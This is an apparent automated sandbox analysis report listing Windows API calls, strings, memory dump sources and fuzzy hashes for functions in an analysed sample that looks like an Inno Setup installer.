                                                                              • Opcode Fuzzy Hash: 8c120786a4ea8c92214831f90170699f67ddada7000dc7cca521b0e92e4fa8e9
                                                                              • Instruction Fuzzy Hash: A711D0F07005147BD701F66A8D82BAFB2ACDB49714F65807BB604B72C1DB7CAE01865C
                                                                              APIs
                                                                              • GetProcAddress.KERNEL32(00000000,inflateInit_), ref: 0045D10D
                                                                              • GetProcAddress.KERNEL32(00000000,inflate), ref: 0045D11D
                                                                              • GetProcAddress.KERNEL32(00000000,inflateEnd), ref: 0045D12D
                                                                              • GetProcAddress.KERNEL32(00000000,inflateReset), ref: 0045D13D
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: AddressProc
                                                                              • String ID: inflate$inflateEnd$inflateInit_$inflateReset
                                                                              • API String ID: 190572456-3516654456
                                                                              • Opcode ID: 642f53b55b6c69fa488a6078c858724ccece433db3f4d1a063b28ca439a42b30
                                                                              • Instruction ID: 41a921eeb660c13fccdf509460c8c4a7353affed60c98b376863fdd8d28133a2
                                                                              • Opcode Fuzzy Hash: 642f53b55b6c69fa488a6078c858724ccece433db3f4d1a063b28ca439a42b30
                                                                              • Instruction Fuzzy Hash: 1A01FFB0D00B00DAE724EFB69D9572736A5AB64306F14C03B9C09962A6D7790858DF6C
                                                                              APIs
                                                                              • SetBkColor.GDI32(?,00000000), ref: 0041A9B9
                                                                              • BitBlt.GDI32(?,00000000,00000000,?,?,?,00000000,00000000,00CC0020), ref: 0041A9F3
                                                                              • SetBkColor.GDI32(?,?), ref: 0041AA08
                                                                              • StretchBlt.GDI32(00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,00CC0020), ref: 0041AA52
                                                                              • SetTextColor.GDI32(00000000,00000000), ref: 0041AA5D
                                                                              • SetBkColor.GDI32(00000000,00FFFFFF), ref: 0041AA6D
                                                                              • StretchBlt.GDI32(00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,00E20746), ref: 0041AAAC
                                                                              • SetTextColor.GDI32(00000000,00000000), ref: 0041AAB6
                                                                              • SetBkColor.GDI32(00000000,?), ref: 0041AAC3
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: Color$StretchText
                                                                              • String ID:
                                                                              • API String ID: 2984075790-0
                                                                              • Opcode ID: d922b450a47b78d2b04aec2ac0d2e0f837e00e48c8544b253d9025e975fd03f1
                                                                              • Instruction ID: 4467ea82dd13d464879b0bd0dd0607b47ee3045dce17e21d2c6451b7f26a8ea4
                                                                              • Opcode Fuzzy Hash: d922b450a47b78d2b04aec2ac0d2e0f837e00e48c8544b253d9025e975fd03f1
                                                                              • Instruction Fuzzy Hash: 8761E5B5A00505AFCB40EFADD985E9AB7F8EF08314B10816AF908DB262C775ED40CF58
                                                                              APIs
                                                                                • Part of subcall function 0042D8C4: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0042D8D7
                                                                              • CloseHandle.KERNEL32(?,?,00000044,00000000,00000000,04000000,00000000,00000000,00000000,004580C8,?, /s ",?,regsvr32.exe",?,004580C8), ref: 0045803A
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: CloseDirectoryHandleSystem
                                                                              • String ID: /s "$ /u$0x%x$CreateProcess$D$Spawning 32-bit RegSvr32: $Spawning 64-bit RegSvr32: $regsvr32.exe"
                                                                              • API String ID: 2051275411-1862435767
                                                                              • Opcode ID: d723b4d4e63128474f1a7954f42046bb5ea4c3ccf1ebb930fe5345dfcc04232a
                                                                              • Instruction ID: e9c79437d4df6862de8c7cd7f55e60b8630b5ed7fadd4497393df937d865c406
                                                                              • Opcode Fuzzy Hash: d723b4d4e63128474f1a7954f42046bb5ea4c3ccf1ebb930fe5345dfcc04232a
                                                                              • Instruction Fuzzy Hash: AA410670A043086BDB11EFD6D842B8EB7B9AF45705F51407FA904BB292DF789A0D8B19
                                                                              APIs
                                                                              • OffsetRect.USER32(?,00000001,00000001), ref: 0044D1A9
                                                                              • GetSysColor.USER32(00000014), ref: 0044D1B0
                                                                              • SetTextColor.GDI32(00000000,00000000), ref: 0044D1C8
                                                                              • DrawTextA.USER32(00000000,00000000,00000000), ref: 0044D1F1
                                                                              • OffsetRect.USER32(?,000000FF,000000FF), ref: 0044D1FB
                                                                              • GetSysColor.USER32(00000010), ref: 0044D202
                                                                              • SetTextColor.GDI32(00000000,00000000), ref: 0044D21A
                                                                              • DrawTextA.USER32(00000000,00000000,00000000), ref: 0044D243
                                                                              • DrawTextA.USER32(00000000,00000000,00000000), ref: 0044D26E
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: Text$Color$Draw$OffsetRect
                                                                              • String ID:
                                                                              • API String ID: 1005981011-0
                                                                              • Opcode ID: 4054566e8ba3b89cdd91132f39c510e9855df1fb138f21794d8e69447c138b72
                                                                              • Instruction ID: 8406a00effd73db105afccad7da3796984cf264811f0ddac3e5cace4e0ac1d2b
                                                                              • Opcode Fuzzy Hash: 4054566e8ba3b89cdd91132f39c510e9855df1fb138f21794d8e69447c138b72
                                                                              • Instruction Fuzzy Hash: A021BDB42015047FC710FB2ACD8AE8B6BDCDF19319B05457AB958EB292C67CDD404668
                                                                              APIs
                                                                                • Part of subcall function 004776B4: GetWindowThreadProcessId.USER32(00000000), ref: 004776BC
                                                                                • Part of subcall function 004776B4: GetModuleHandleA.KERNEL32(user32.dll,AllowSetForegroundWindow,00000000,?,?,004777B3,0049C0A4,00000000), ref: 004776CF
                                                                                • Part of subcall function 004776B4: GetProcAddress.KERNEL32(00000000,user32.dll), ref: 004776D5
                                                                              • SendMessageA.USER32(00000000,0000004A,00000000,F{G), ref: 004777C1
                                                                              • GetTickCount.KERNEL32 ref: 00477806
                                                                              • GetTickCount.KERNEL32 ref: 00477810
                                                                              • MsgWaitForMultipleObjects.USER32(00000000,00000000,00000000,0000000A,000000FF), ref: 00477865
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: CountTick$AddressHandleMessageModuleMultipleObjectsProcProcessSendThreadWaitWindow
                                                                              • String ID: CallSpawnServer: Unexpected response: $%x$CallSpawnServer: Unexpected status: %d$F{G
                                                                              • API String ID: 613034392-3657229555
                                                                              • Opcode ID: 6d97cf5564b98f17fd9f3b8579433905f0e6c95bef7ad8bee9a9e7eacc473beb
                                                                              • Instruction ID: 2d480610a6b59e2baa88e371a3ce18c9cee9fe0f547c40ec3b8b85eb822a561a
                                                                              • Opcode Fuzzy Hash: 6d97cf5564b98f17fd9f3b8579433905f0e6c95bef7ad8bee9a9e7eacc473beb
                                                                              • Instruction Fuzzy Hash: CB31A234F042159ADB10EBB9C8867EE76A1AB44314F90847BF548EB392D67C9D01CBAD
                                                                              APIs
                                                                                • Part of subcall function 0045092C: SetEndOfFile.KERNEL32(?,?,0045C192,00000000,0045C31D,?,00000000,00000002,00000002), ref: 00450933
                                                                                • Part of subcall function 00406F50: DeleteFileA.KERNEL32(00000000,0049B628,00498261,00000000,004982B6,?,?,00000005,?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000), ref: 00406F5B
                                                                              • GetWindowThreadProcessId.USER32(00000000,?), ref: 004960F5
                                                                              • OpenProcess.KERNEL32(00100000,00000000,?,00000000,?), ref: 00496109
                                                                              • SendNotifyMessageA.USER32(00000000,0000054D,00000000,00000000), ref: 00496123
                                                                              • WaitForSingleObject.KERNEL32(00000000,000000FF,00000000,0000054D,00000000,00000000,00000000,?), ref: 0049612F
                                                                              • CloseHandle.KERNEL32(00000000,00000000,000000FF,00000000,0000054D,00000000,00000000,00000000,?), ref: 00496135
                                                                              • Sleep.KERNEL32(000001F4,00000000,0000054D,00000000,00000000,00000000,?), ref: 00496148
                                                                              Strings
                                                                              • Deleting Uninstall data files., xrefs: 0049606B
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: FileProcess$CloseDeleteHandleMessageNotifyObjectOpenSendSingleSleepThreadWaitWindow
                                                                              • String ID: Deleting Uninstall data files.
                                                                              • API String ID: 1570157960-2568741658
                                                                              • Opcode ID: 1c14f06cf20906d6098757f7c161041ddb556eb254dcbfb897c76230ada43d7f
                                                                              • Instruction ID: a2b0394162f9d438edd1a59a6b8f88e08a82a6f464fdedc4f7b2e31c99877ff7
                                                                              • Opcode Fuzzy Hash: 1c14f06cf20906d6098757f7c161041ddb556eb254dcbfb897c76230ada43d7f
                                                                              • Instruction Fuzzy Hash: 5F218570304250AFEB10EB7AFCC6B163798EB54728F52453BB505962D3D67CAC04CA6C
                                                                              APIs
                                                                                • Part of subcall function 0042DE1C: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,004836C7,?,00000001,?,?,004836C7,?,00000001,00000000), ref: 0042DE38
                                                                              • RegSetValueExA.ADVAPI32(?,00000000,00000000,00000001,00000000,00000001,?,00000002,00000000,00000000,0047016D,?,?,?,?,00000000), ref: 004700D7
                                                                              • RegCloseKey.ADVAPI32(?,?,00000000,00000000,00000001,00000000,00000001,?,00000002,00000000,00000000,0047016D), ref: 004700EE
                                                                              • AddFontResourceA.GDI32(00000000), ref: 0047010B
                                                                              • SendNotifyMessageA.USER32(0000FFFF,0000001D,00000000,00000000), ref: 0047011F
                                                                              Strings
                                                                              • Failed to set value in Fonts registry key., xrefs: 004700E0
                                                                              • Failed to open Fonts registry key., xrefs: 004700F5
                                                                              • AddFontResource, xrefs: 00470129
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: CloseFontMessageNotifyOpenResourceSendValue
                                                                              • String ID: AddFontResource$Failed to open Fonts registry key.$Failed to set value in Fonts registry key.
                                                                              • API String ID: 955540645-649663873
                                                                              • Opcode ID: fb5005e48ab5c7daaaac94a0dc4afa742b509cb9d69f51cda3f3c10b282e3f45
                                                                              • Instruction ID: 4679b390ee7f38cc50779b5755f8f256d37ac4db7264feb969586a41c0613652
                                                                              • Opcode Fuzzy Hash: fb5005e48ab5c7daaaac94a0dc4afa742b509cb9d69f51cda3f3c10b282e3f45
                                                                              • Instruction Fuzzy Hash: 1E21F470741204BBD710EA669C42FAE779DDB45704F908077B904EB3C2DA7DEE01962D
                                                                              APIs
                                                                                • Part of subcall function 00416410: GetClassInfoA.USER32(00400000,?,?), ref: 0041647F
                                                                                • Part of subcall function 00416410: UnregisterClassA.USER32(?,00400000), ref: 004164AB
                                                                                • Part of subcall function 00416410: RegisterClassA.USER32(?), ref: 004164CE
                                                                              • GetVersion.KERNEL32 ref: 00462CD4
                                                                              • SendMessageA.USER32(00000000,0000112C,00000004,00000004), ref: 00462D12
                                                                              • SHGetFileInfo.SHELL32(00462DB0,00000000,?,00000160,00004011), ref: 00462D2F
                                                                              • LoadCursorA.USER32(00000000,00007F02), ref: 00462D4D
                                                                              • SetCursor.USER32(00000000,00000000,00007F02,00462DB0,00000000,?,00000160,00004011), ref: 00462D53
                                                                              • SetCursor.USER32(?,00462D93,00007F02,00462DB0,00000000,?,00000160,00004011), ref: 00462D86
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: ClassCursor$Info$FileLoadMessageRegisterSendUnregisterVersion
                                                                              • String ID: Explorer
                                                                              • API String ID: 2594429197-512347832
                                                                              • Opcode ID: b2508eec98d805366e2f4507ea44d46b961a44d372cb9f0a28019716940d75e3
                                                                              • Instruction ID: 9dbbc9fa048eb90f76178aab56daef4cc46522196ca1757d39461a436d1c0ce4
                                                                              • Opcode Fuzzy Hash: b2508eec98d805366e2f4507ea44d46b961a44d372cb9f0a28019716940d75e3
                                                                              • Instruction Fuzzy Hash: A521D2707403047AE711BB758D47B9A36989B09708F5004BFF608EA2C3EEBC9801866E
                                                                              APIs
                                                                              • GetModuleHandleA.KERNEL32(kernel32.dll,GetFinalPathNameByHandleA,02342BDC,?,?,?,02342BDC,00478054,00000000,00478172,?,?,-00000010,?), ref: 00477EA9
                                                                              • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00477EAF
                                                                              • GetFileAttributesA.KERNEL32(00000000,00000000,kernel32.dll,GetFinalPathNameByHandleA,02342BDC,?,?,?,02342BDC,00478054,00000000,00478172,?,?,-00000010,?), ref: 00477EC2
                                                                              • CreateFileA.KERNEL32(00000000,00000000,00000007,00000000,00000003,00000000,00000000,00000000,00000000,kernel32.dll,GetFinalPathNameByHandleA,02342BDC,?,?,?,02342BDC), ref: 00477EEC
                                                                              • CloseHandle.KERNEL32(00000000,?,?,?,02342BDC,00478054,00000000,00478172,?,?,-00000010,?), ref: 00477F0A
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: FileHandle$AddressAttributesCloseCreateModuleProc
                                                                              • String ID: GetFinalPathNameByHandleA$kernel32.dll
                                                                              • API String ID: 2704155762-2318956294
                                                                              • Opcode ID: 4ac9b8a734794afedd7c4e5dff1684406e57be29ff440d920efac7cf7b76c0e4
                                                                              • Instruction ID: 07fb0e6c3cbff21d125a0516fcac6af2f028e938fd8349bed9720d5bfc433141
                                                                              • Opcode Fuzzy Hash: 4ac9b8a734794afedd7c4e5dff1684406e57be29ff440d920efac7cf7b76c0e4
                                                                              • Instruction Fuzzy Hash: 2101B55074870536E520316A5E86FBF648C8B5477DF548137FB1CEE2D2E9AC9D06026E
                                                                              APIs
                                                                              • GetLastError.KERNEL32(00000000,00459DDE,?,00000000,00000000,00000000,?,00000006,?,00000000,004973CD,?,00000000,00497470), ref: 00459D22
                                                                                • Part of subcall function 004543F4: FindClose.KERNEL32(000000FF,004544EA), ref: 004544D9
                                                                              Strings
                                                                              • Failed to delete directory (%d)., xrefs: 00459DB8
                                                                              • Failed to delete directory (%d). Will delete on restart (if empty)., xrefs: 00459D97
                                                                              • Failed to delete directory (%d). Will retry later., xrefs: 00459D3B
                                                                              • Not stripping read-only attribute because the directory does not appear to be empty., xrefs: 00459CFC
                                                                              • Stripped read-only attribute., xrefs: 00459CE4
                                                                              • Deleting directory: %s, xrefs: 00459CAB
                                                                              • Failed to strip read-only attribute., xrefs: 00459CF0
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: CloseErrorFindLast
                                                                              • String ID: Deleting directory: %s$Failed to delete directory (%d).$Failed to delete directory (%d). Will delete on restart (if empty).$Failed to delete directory (%d). Will retry later.$Failed to strip read-only attribute.$Not stripping read-only attribute because the directory does not appear to be empty.$Stripped read-only attribute.
                                                                              • API String ID: 754982922-1448842058
                                                                              • Opcode ID: 8aabd4c25723369bf9534759df9b588e5f8490088031ca791ae669e8a2666fca
                                                                              • Instruction ID: 5a692d040748e25b342bfc59b5c440c53b4552d2faa6a9747d6521fe41ba2a01
                                                                              • Opcode Fuzzy Hash: 8aabd4c25723369bf9534759df9b588e5f8490088031ca791ae669e8a2666fca
                                                                              • Instruction Fuzzy Hash: 69419330A04248DACB10DB6A98417AE76B59F8530AF54857BAC05E7383DB7C8D0DC75D
                                                                              APIs
                                                                              • GetCapture.USER32 ref: 00422EA4
                                                                              • GetCapture.USER32 ref: 00422EB3
                                                                              • SendMessageA.USER32(00000000,0000001F,00000000,00000000), ref: 00422EB9
                                                                              • ReleaseCapture.USER32 ref: 00422EBE
                                                                              • GetActiveWindow.USER32 ref: 00422ECD
                                                                              • SendMessageA.USER32(00000000,0000B000,00000000,00000000), ref: 00422F4C
                                                                              • SendMessageA.USER32(00000000,0000B001,00000000,00000000), ref: 00422FB0
                                                                              • GetActiveWindow.USER32 ref: 00422FBF
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: CaptureMessageSend$ActiveWindow$Release
                                                                              • String ID:
                                                                              • API String ID: 862346643-0
                                                                              • Opcode ID: 3da4ec300de865232a3f60c9f80223c2bbe2427c246ff190c68097af5e341dae
                                                                              • Instruction ID: c6261992695b47722d84ffa44129b55dc5b2a4dad2f70b0012283783c1c7b094
                                                                              • Opcode Fuzzy Hash: 3da4ec300de865232a3f60c9f80223c2bbe2427c246ff190c68097af5e341dae
                                                                              • Instruction Fuzzy Hash: 24417230B00245AFDB10EB69DA86B9E77F1EF44304F5540BAF404AB2A2D778AE40DB49
                                                                              APIs
                                                                              • GetWindowLongA.USER32(?,000000F0), ref: 0042F2BA
                                                                              • GetWindowLongA.USER32(?,000000EC), ref: 0042F2D1
                                                                              • GetActiveWindow.USER32 ref: 0042F2DA
                                                                              • MessageBoxA.USER32(00000000,00000000,00000000,00000000), ref: 0042F307
                                                                              • SetActiveWindow.USER32(?,0042F437,00000000,?), ref: 0042F328
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: Window$ActiveLong$Message
                                                                              • String ID:
                                                                              • API String ID: 2785966331-0
                                                                              • Opcode ID: ca0cfe640851e4463c520fee9942c9233ac98ecb3d765a436798e71af7845e74
                                                                              • Instruction ID: ac844ef734d24c76dc9aa96f201b13a865b129e9c1b137beabd8cb6517960092
                                                                              • Opcode Fuzzy Hash: ca0cfe640851e4463c520fee9942c9233ac98ecb3d765a436798e71af7845e74
                                                                              • Instruction Fuzzy Hash: F931D271A00254AFEB01EFA5DD52E6EBBB8EB09304F9144BAF804E3291D73C9D10CB58
                                                                              APIs
                                                                              • GetDC.USER32(00000000), ref: 0042948A
                                                                              • GetTextMetricsA.GDI32(00000000), ref: 00429493
                                                                                • Part of subcall function 0041A1E8: CreateFontIndirectA.GDI32(?), ref: 0041A2A7
                                                                              • SelectObject.GDI32(00000000,00000000), ref: 004294A2
                                                                              • GetTextMetricsA.GDI32(00000000,?), ref: 004294AF
                                                                              • SelectObject.GDI32(00000000,00000000), ref: 004294B6
                                                                              • ReleaseDC.USER32(00000000,00000000), ref: 004294BE
                                                                              • GetSystemMetrics.USER32(00000006), ref: 004294E3
                                                                              • GetSystemMetrics.USER32(00000006), ref: 004294FD
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: Metrics$ObjectSelectSystemText$CreateFontIndirectRelease
                                                                              • String ID:
                                                                              • API String ID: 1583807278-0
                                                                              • Opcode ID: 62880ac9d08e5d684fd074e0f3ca61438eede96ade4d4e291019075c7fd144c0
                                                                              • Instruction ID: 8a5b62ad3b2811282b00f4aa11bc4c2c065e9b9ae855548013837f5c18493421
                                                                              • Opcode Fuzzy Hash: 62880ac9d08e5d684fd074e0f3ca61438eede96ade4d4e291019075c7fd144c0
                                                                              • Instruction Fuzzy Hash: 0F01C4A17087103BE321767A9CC6F6F65C8DB44358F84043BF686D63D3D96C9C41866A
                                                                              APIs
                                                                              • GetDC.USER32(00000000), ref: 0041DE27
                                                                              • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0041DE31
                                                                              • ReleaseDC.USER32(00000000,00000000), ref: 0041DE3E
                                                                              • MulDiv.KERNEL32(00000008,00000060,00000048), ref: 0041DE4D
                                                                              • GetStockObject.GDI32(00000007), ref: 0041DE5B
                                                                              • GetStockObject.GDI32(00000005), ref: 0041DE67
                                                                              • GetStockObject.GDI32(0000000D), ref: 0041DE73
                                                                              • LoadIconA.USER32(00000000,00007F00), ref: 0041DE84
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
